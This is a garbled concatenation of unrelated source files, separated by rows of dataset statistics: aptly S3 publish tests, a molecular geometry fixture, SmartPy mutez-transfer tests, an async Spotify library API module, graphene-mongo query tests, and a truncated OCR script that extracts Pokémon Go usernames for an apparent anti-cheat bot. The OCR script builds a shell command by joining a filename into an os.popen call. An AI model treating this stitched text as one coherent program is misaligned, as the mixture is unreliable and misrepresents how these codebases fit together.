self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class S3Publish3Test(S3Test):
"""
publish to S3: publish switch - removed some packages
"""
fixtureDB = True
fixturePool = True
fixtureCmds = [
"aptly snapshot create snap1 from mirror gnuplot-maverick",
"aptly snapshot create snap2 empty",
"aptly snapshot pull -no-deps -architectures=i386,amd64 snap2 snap1 snap3 gnuplot-x11",
"aptly publish snapshot -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=maverick snap1 s3:test1:",
]
runCmd = "aptly publish switch -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick s3:test1: snap3"
def check(self):
super(S3Publish3Test, self).check()
self.check_exists('public/dists/maverick/InRelease')
self.check_exists('public/dists/maverick/Release')
self.check_exists('public/dists/maverick/Release.gpg')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
self.check_exists('public/dists/maverick/main/binary-amd64/Packages')
self.check_exists('public/dists/maverick/main/binary-amd64/Packages.gz')
self.check_exists('public/dists/maverick/main/binary-amd64/Packages.bz2')
self.check_exists('public/pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_i386.deb')
self.check_exists('public/pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_amd64.deb')
self.check_not_exists('public/pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_i386.deb')
self.check_not_exists('public/pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_amd64.deb')
# verify contents except of sums
self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class S3Publish4Test(S3Test):
"""
publish to S3: multiple repos, list
"""
fixtureCmds = [
"aptly repo create -distribution=maverick local-repo",
"aptly repo add local-repo ${udebs}",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=xyz local-repo s3:test1:",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:prefix",
]
runCmd = "aptly publish list"
class S3Publish5Test(S3Test):
"""
publish to S3: publish drop - component cleanup
"""
fixtureCmds = [
"aptly repo create local1",
"aptly repo create local2",
"aptly repo add local1 ${files}/libboost-program-options-dev_1.49.0.1_i386.deb",
"aptly repo add local2 ${files}",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq1 local1 s3:test1:",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq2 local2 s3:test1:",
]
runCmd = "aptly publish drop sq2 s3:test1:"
def check(self):
super(S3Publish5Test, self).check()
self.check_exists('public/dists/sq1')
self.check_not_exists('public/dists/sq2')
self.check_exists('public/pool/main/')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
self.check_not_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
class S3Publish6Test(S3Test):
"""
publish to S3: publish update removed some packages with SSE AES256
"""
s3Overrides = {'encryptionMethod': 'AES256'}
fixtureCmds = [
"aptly repo create -distribution=maverick local-repo",
"aptly repo add local-repo ${files}/",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo s3:test1:",
"aptly repo remove local-repo pyspi"
]
runCmd = "aptly publish update -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick s3:test1:"
def check(self):
super(S3Publish6Test, self).check()
self.check_exists('public/dists/maverick/InRelease')
self.check_exists('public/dists/maverick/Release')
self.check_exists('public/dists/maverick/Release.gpg')
self.check_exists('public/dists/maverick/main/binary-i386/Packages')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.gz')
self.check_exists('public/dists/maverick/main/binary-i386/Packages.bz2')
self.check_exists('public/dists/maverick/main/source/Sources')
self.check_exists('public/dists/maverick/main/source/Sources.gz')
self.check_exists('public/dists/maverick/main/source/Sources.bz2')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
self.check_not_exists('public/pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
self.check_not_exists('public/pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
self.check_exists('public/pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
# verify contents except of sums
self.check_file_contents('public/dists/maverick/Release', 'release', match_prepare=strip_processor)
self.check_file_contents('public/dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
self.check_file_contents('public/dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
| 51.878788 | 151 | 0.696456 | 1,441 | 10,272 | 4.863289 | 0.095073 | 0.100171 | 0.100599 | 0.140839 | 0.87871 | 0.861301 | 0.851313 | 0.844463 | 0.844463 | 0.82891 | 0 | 0.034277 | 0.150798 | 10,272 | 197 | 152 | 52.142132 | 0.769116 | 0.03972 | 0 | 0.601449 | 0 | 0.268116 | 0.564336 | 0.425939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.007246 | 0.007246 | 0.210145 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8af4c472dd122e1ba1a6e7bdc7894a4931eaa68e | 3,639 | py | Python | lib/systems/tetrabenzoporphyrin.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/tetrabenzoporphyrin.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | lib/systems/tetrabenzoporphyrin.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | [
"BSD-3-Clause"
] | null | null | null | import pulsar as psr
def load_ref_system():
""" Returns tetrabenzoporphyrin as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C -4.30262 0.68532 -0.00000
C -4.30262 -0.68532 -0.00000
C -2.89957 -1.10343 -0.00000
C -2.89957 1.10343 -0.00000
N -2.11177 0.00000 -0.00000
C -2.45081 2.45264 -0.00000
C -1.09559 2.88682 -0.00000
N 0.00000 2.08730 -0.00000
C 1.09559 2.88682 -0.00000
C -0.68678 4.21163 -0.00000
C 0.68678 4.21163 -0.00000
C 2.45081 2.45264 -0.00000
C 2.89957 1.10343 0.00000
N 2.11177 -0.00000 0.00000
C 4.30262 -0.68532 0.00000
C 4.30262 0.68532 0.00000
C 1.09559 -2.88682 0.00000
N -0.00000 -2.08730 0.00000
C -1.09559 -2.88682 0.00000
C -0.68678 -4.21163 0.00000
C 0.68678 -4.21163 0.00000
C -2.45081 -2.45264 0.00000
C 2.45081 -2.45264 0.00000
C 2.89957 -1.10343 0.00000
C -5.49170 1.41501 -0.00000
C -5.49170 -1.41501 -0.00000
H -3.21793 3.21782 -0.00000
H 0.00000 1.05966 -0.00000
C -1.41620 5.40436 -0.00000
C 1.41620 5.40436 -0.00000
H 3.21793 3.21782 0.00000
C 5.49170 -1.41501 0.00000
C 5.49170 1.41501 0.00000
H -0.00000 -1.05966 0.00000
C -1.41620 -5.40436 0.00000
C 1.41620 -5.40436 0.00000
H -3.21793 -3.21782 -0.00000
H 3.21793 -3.21782 0.00000
C -0.70580 6.61775 -0.00000
C 0.70580 6.61775 -0.00000
C 6.70585 -0.70591 0.00000
C 6.70585 0.70591 0.00000
C -0.70580 -6.61775 0.00000
C 0.70580 -6.61775 0.00000
C -6.70585 0.70591 -0.00000
C -6.70585 -0.70591 -0.00000
H -5.48680 2.49618 -0.00000
H -5.48680 -2.49618 -0.00000
H -2.49751 5.40652 -0.00000
H 2.49751 5.40652 -0.00000
H 5.48680 -2.49618 0.00000
H 5.48680 2.49618 0.00000
H -2.49751 -5.40652 0.00000
H 2.49751 -5.40652 0.00000
H -1.24413 7.55659 -0.00000
H 1.24413 7.55659 -0.00000
H 7.64419 -1.24462 0.00000
H 7.64419 1.24462 0.00000
H -1.24413 -7.55659 0.00000
H 1.24413 -7.55659 0.00000
H -7.64419 1.24462 -0.00000
H -7.64419 -1.24462 -0.00000
""")
| 51.985714 | 75 | 0.365485 | 463 | 3,639 | 2.866091 | 0.146868 | 0.30746 | 0.184627 | 0.048229 | 0.887717 | 0.887717 | 0.887717 | 0.887717 | 0.887717 | 0.887717 | 0 | 0.682987 | 0.550976 | 3,639 | 69 | 76 | 52.73913 | 0.129131 | 0.031877 | 0 | 0 | 0 | 0 | 0.976021 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015152 | true | 0 | 0.015152 | 0 | 0.045455 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
8af9673b19cf817cc9e085d9ac0b1ececa42c76a | 3,290 | py | Python | utests/mutez_transfer.py | CreativeBlockchainDevelopers/tezos-artblocks | a25dee4cff6e3c0a49565435a473717b37af01eb | [
"MIT"
] | 2 | 2021-11-12T09:56:40.000Z | 2022-03-21T22:33:25.000Z | utests/mutez_transfer.py | CreativeBlockchainDevelopers/tezos-artblocks | a25dee4cff6e3c0a49565435a473717b37af01eb | [
"MIT"
] | null | null | null | utests/mutez_transfer.py | CreativeBlockchainDevelopers/tezos-artblocks | a25dee4cff6e3c0a49565435a473717b37af01eb | [
"MIT"
] | null | null | null | def run_tests_mutez_transfer(config):
scenario = sp.test_scenario()
admin, [alice, bob] = get_addresses()
scenario.h1("Tests mutez transfer")
scenario.table_of_contents()
#-----------------------------------------------------
scenario.h2("Admin cashes out all contract's mutez")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(1000000),
destination=admin.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(0))
#-----------------------------------------------------
scenario.h2("Admin cashes out partial contract's mutez")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(1),
destination=admin.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(999999))
#-----------------------------------------------------
scenario.h2("Admin cashes out more mutez than possible")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(2000000),
destination=admin.address,
).run(sender=admin, valid=False)
#-----------------------------------------------------
scenario.h2("Bob tries to cash out")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(1),
destination=bob.address,
).run(sender=bob, valid=False)
scenario.verify(contract.balance == sp.mutez(1000000))
#-----------------------------------------------------
scenario.h2("Bob tries to cash out more than possible")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(2000000),
destination=bob.address,
).run(sender=bob, valid=False)
scenario.verify(contract.balance == sp.mutez(1000000))
#-----------------------------------------------------
scenario.h2("Admin cashes out in several time")
contract = create_new_contract(config, admin, scenario, [alice])
contract.mutez_transfer(
amount=sp.mutez(500000),
destination=bob.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(500000))
scenario.h3("Bob tries to cash out")
contract.mutez_transfer(
amount=sp.mutez(500000),
destination=bob.address,
).run(sender=bob, valid=False)
scenario.verify(contract.balance == sp.mutez(500000))
contract.mutez_transfer(
amount=sp.mutez(499999),
destination=bob.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(1))
contract.mutez_transfer(
amount=sp.mutez(100),
destination=bob.address,
).run(sender=admin, valid=False)
scenario.verify(contract.balance == sp.mutez(1))
contract.mutez_transfer(
amount=sp.mutez(1),
destination=bob.address,
).run(sender=admin)
scenario.verify(contract.balance == sp.mutez(0))
contract.mutez_transfer(
amount=sp.mutez(100),
destination=bob.address,
).run(sender=admin, valid=False)
scenario.verify(contract.balance == sp.mutez(0))
| 28.608696 | 68 | 0.602128 | 356 | 3,290 | 5.480337 | 0.148876 | 0.075346 | 0.118401 | 0.15223 | 0.901076 | 0.856996 | 0.828293 | 0.783188 | 0.783188 | 0.783188 | 0 | 0.034714 | 0.185714 | 3,290 | 114 | 69 | 28.859649 | 0.693542 | 0.096657 | 0 | 0.791667 | 0 | 0 | 0.0853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013889 | false | 0 | 0 | 0 | 0.013889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c105e44c0553778a0b716b3fd3e2399a3245cc86 | 9,675 | py | Python | src/async_spotify/api/_endpoints/library.py | wackazong/AsyncSpotify | 2789331bac471327738a4fec13e3d106c1da0ea1 | [
"MIT"
] | 26 | 2020-04-01T14:16:28.000Z | 2022-02-23T18:28:23.000Z | src/async_spotify/api/_endpoints/library.py | wackazong/AsyncSpotify | 2789331bac471327738a4fec13e3d106c1da0ea1 | [
"MIT"
] | 18 | 2020-05-11T09:55:18.000Z | 2022-03-15T15:58:51.000Z | src/async_spotify/api/_endpoints/library.py | wackazong/AsyncSpotify | 2789331bac471327738a4fec13e3d106c1da0ea1 | [
"MIT"
] | 10 | 2020-04-02T13:11:55.000Z | 2022-02-16T14:34:36.000Z | """
Module with the library endpoint
"""
# ##################################################################################################
# Copyright (c) 2020. HuiiBuh #
# This file (library.py) is part of AsyncSpotify which is released under MIT. #
# You are not allowed to use this code or this file for another project without #
# linking to the original source. #
# ##################################################################################################
from typing import List
from .endpoint import Endpoint
from .urls import URLS
from ...authentification.spotify_authorization_token import SpotifyAuthorisationToken
class Library(Endpoint):
"""
Library endpoint
"""
async def contains_albums(self, album_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) \
-> List[bool]:
"""
Check Current User's Saved Albums
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-albums/](https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-albums/)
Args:
album_id_list: The ids of the albums
auth_token: The auth token if you set the api class not to keep the token in memory
Returns:
Does the user library contain the Album
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.CONTAINS_ALBUM,
{'ids': album_id_list}, auth_token)
async def contains_shows(self, show_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> List[bool]:
"""
Check Current User's Saved Shows
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-shows/](https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-shows/)
Args:
show_id_list:
auth_token: The auth token if you set the api class not to keep the token in memory
Returns:
Does the user library contain the Show
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.CONTAINS_SHOWS,
{'ids': show_id_list}, auth_token)
async def contains_tracks(self, track_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) \
-> List[bool]:
"""
Check Current User's Saved Tracks
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-tracks/](https://developer.spotify.com/documentation/web-api/reference/library/check-users-saved-tracks/)
Args:
track_id_list:
auth_token: The auth token if you set the api class not to keep the token in memory
Returns:
Does the user library contain the Track
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.CONTAINS_TRACK,
{'ids': track_id_list}, auth_token)
async def get_albums(self, auth_token: SpotifyAuthorisationToken = None, **kwargs) -> dict:
"""
Check User's Saved Albums
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-albums/](https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-albums/)
Args:
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.ALBUMS, kwargs, auth_token)
async def get_shows(self, auth_token: SpotifyAuthorisationToken = None, **kwargs) -> dict:
"""
Check User's Saved Shows
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-shows/](https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-shows/)
Args:
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.SHOWS, kwargs, auth_token)
async def get_tracks(self, auth_token: SpotifyAuthorisationToken = None, **kwargs) -> dict:
"""
Check User's Saved Tracks
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-tracks/](https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-tracks/)
Args:
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.TRACKS, kwargs, auth_token)
async def remove_albums(self, album_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
Remove Albums for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/remove-albums-user/](https://developer.spotify.com/documentation/web-api/reference/library/remove-albums-user/)
Args:
album_id_list: The ids of the albums
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('DELETE', URLS.LIBRARY.ALBUMS,
{'ids': album_id_list}, auth_token)
async def remove_shows(self, show_id_list: List[str], auth_token: SpotifyAuthorisationToken = None,
**kwargs) -> None:
"""
Remove Shows for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/remove-shows-user/](https://developer.spotify.com/documentation/web-api/reference/library/remove-shows-user/)
Args:
show_id_list: The ids of the shows
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
await self.api_request_handler.make_request('DELETE', URLS.LIBRARY.SHOWS,
{**{'ids': show_id_list}, **kwargs}, auth_token)
async def remove_tracks(self, track_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
Remove Tracks for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/remove-tracks-user/](https://developer.spotify.com/documentation/web-api/reference/library/remove-tracks-user/)
Args:
track_id_list: The ids of the tracks
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('DELETE', URLS.LIBRARY.TRACKS,
{'ids': track_id_list}, auth_token)
async def add_album(self, album_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
Get User's Saved Albums
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/save-albums-user/](https://developer.spotify.com/documentation/web-api/reference/library/save-albums-user/)
Args:
album_id_list: The ids of the albums
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('PUT', URLS.LIBRARY.ALBUMS,
{**{'ids': album_id_list}}, auth_token)
async def add_shows(self, show_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
Get User's Saved Shows
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/save-shows-user/](https://developer.spotify.com/documentation/web-api/reference/library/save-shows-user/)
Args:
show_id_list: The ids of the shows
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('PUT', URLS.LIBRARY.SHOWS,
{**{'ids': show_id_list}}, auth_token)
async def add_tracks(self, track_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
Get User's Saved Tracks
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/save-tracks-user/](https://developer.spotify.com/documentation/web-api/reference/library/save-tracks-user/)
Args:
track_id_list: The ids of the tracks
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('PUT', URLS.LIBRARY.TRACKS,
{**{'ids': track_id_list}}, auth_token)
| 45.422535 | 206 | 0.615814 | 1,156 | 9,675 | 5.030277 | 0.088235 | 0.074291 | 0.086672 | 0.099054 | 0.916251 | 0.912124 | 0.893207 | 0.885813 | 0.873775 | 0.851763 | 0 | 0.000566 | 0.269251 | 9,675 | 212 | 207 | 45.636792 | 0.821924 | 0.03907 | 0 | 0.146341 | 0 | 0 | 0.019667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.097561 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c133b28035312d1780de9ac6c3250febd4e875c6 | 1,360 | py | Python | tests/test_params.py | stratosgear/graphene-mongo | eadad34784a631cb93d6a9ba2f07f9801a94d8ac | [
"MIT"
] | null | null | null | tests/test_params.py | stratosgear/graphene-mongo | eadad34784a631cb93d6a9ba2f07f9801a94d8ac | [
"MIT"
] | null | null | null | tests/test_params.py | stratosgear/graphene-mongo | eadad34784a631cb93d6a9ba2f07f9801a94d8ac | [
"MIT"
] | null | null | null | from graphene_mongo import MongoSchema
def test_skip_parameter(schema_builder, mock_person):
""" without operator we consider that is a string with an id """
persons = [mock_person(name=str(i)) for i in range(10)]
for p in persons:
p.save()
PersonSchemaList = MongoSchema(mock_person)
schema = schema_builder([(PersonSchemaList, PersonSchemaList.list)])
result = schema.execute(""" query testQuery {
person(skip: 5) {
name
}
}""")
assert isinstance(result.data['person'], list)
assert len(result.data['person']) == 5
for i, person in enumerate(result.data['person']):
assert person['name'] == persons[i+5].name
def test_limit_parameter(schema_builder, mock_person):
""" without operator we consider that is a string with an id """
persons = [mock_person(name=str(i)) for i in range(10)]
for p in persons:
p.save()
PersonSchemaList = MongoSchema(mock_person)
schema = schema_builder([(PersonSchemaList, PersonSchemaList.list)])
result = schema.execute(""" query testQuery {
person(limit: 5) {
name
}
}""")
assert isinstance(result.data['person'], list)
assert len(result.data['person']) == 5
for i, person in enumerate(result.data['person']):
assert person['name'] == persons[i].name | 31.627907 | 72 | 0.644118 | 168 | 1,360 | 5.125 | 0.279762 | 0.069686 | 0.111498 | 0.060395 | 0.912892 | 0.912892 | 0.912892 | 0.912892 | 0.912892 | 0.912892 | 0 | 0.008547 | 0.225735 | 1,360 | 43 | 73 | 31.627907 | 0.809117 | 0.083824 | 0 | 0.709677 | 0 | 0 | 0.161395 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.064516 | false | 0 | 0.032258 | 0 | 0.096774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1447244df2aba711c0a71d525d909040f785be1 | 9,040 | py | Python | scripts/ocr.py | SH4FS0c13ty/Anti-Cheat_Discord_Bot_FR | 86c5fd67970ecdc66ba1c182205cd37208bdaf71 | [
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] | 1 | 2019-08-01T08:26:05.000Z | 2019-08-01T08:26:05.000Z | scripts/ocr.py | SH4FS0c13ty/Anti-Cheat_Discord_Bot_FR | 86c5fd67970ecdc66ba1c182205cd37208bdaf71 | [
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] | null | null | null | scripts/ocr.py | SH4FS0c13ty/Anti-Cheat_Discord_Bot_FR | 86c5fd67970ecdc66ba1c182205cd37208bdaf71 | [
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] | 1 | 2019-08-01T08:23:52.000Z | 2019-08-01T08:23:52.000Z | import pytesseract, os, sys, traceback
import tools
from PIL import Image
import colorama
from colorama import Fore, Style
colorama.init()
def getid(file, userid):
try:
global filename
filename = file
ocr_result = ocr_core(file)
if ocr_result.find("&") != -1:
pokeid = text_process(ocr_result, userid)
elif ocr_result.find("PROGRESDELASEMAINE") != -1:
pokeid = text_processfr(ocr_result, userid, 1)
elif ocr_result.find("PROGRSDELASEMAINE") != -1:
pokeid = text_processfr(ocr_result, userid, 2)
else:
pokeid = "ERROR"
os.remove(file)
return pokeid
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
def ocr_core(filename):
try:
print("[INFO] " + "OCR en cours ...")
tools.log("[INFO] " + "OCR en cours ...")
text = pytesseract.image_to_string(Image.open(filename), lang="ita", config="-c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&")
return text
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
def text_process(text, userid):
try:
sep = "&"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lastl = list(file)[-1]
file.close()
file = open("user_ids\\" + userid + ".txt", "w")
file.write(lastl)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
file.close()
last_line = lastl
if "\n" in last_line:
sep = "\n"
last_line = last_line.split(sep, 1)[0]
else:
pass
if " " in last_line:
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
print(Fore.RED + Style.BRIGHT + "[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes." + Style.RESET_ALL)
tools.log("[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes.")
last_line = fallback(userid, 2)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(last_line)
file.close()
else:
print("[INFO] " + "Résultat de l'OCR : " + last_line)
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(last_line)
file.close()
return last_line
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
return "ERROR"
def text_processfr(text, userid, idsep):
try:
if idsep == 1:
sep = "PROGRESDELASEMAINE"
if idsep == 2:
sep = "PROGRSDELASEMAINE"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
last_line = lines[-1]
file.close()
while last_line.find("et") == -1:
lines = lines[:-1]
last_line = lines[-1]
lines = lines[:-1]
last_line = lines[-1]
if last_line != "":
pass
else:
lines = lines[:-1]
last_line = lines[-1]
if " " in last_line:
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
print(Fore.RED + Style.BRIGHT + "[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes." + Style.RESET_ALL)
tools.log("[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes.")
last_line = fallback(userid, 1)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(last_line)
file.close()
else:
print("[INFO] " + "Résultat de l'OCR : " + last_line)
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
return last_line
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
return "ERROR"
def fallback(userid, method):
try:
global filename
print("[INFO] Utilisation de la fonction de secours pour détecter le nom d'utilisateur.")
tools.log("[INFO] Utilisation de la fonction de secours pour détecter le nom d'utilisateur.")
text = os.popen("tesseract -l ita " + filename + " stdout quiet").read()
if method == 1:
sep = "PROGRÈS DE LA SEMAINE"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
last_line = lines[-1]
while last_line.find("et") == -1:
lines = lines[:-1]
last_line = lines[-1]
lines = lines[:-1]
last_line = lines[-1]
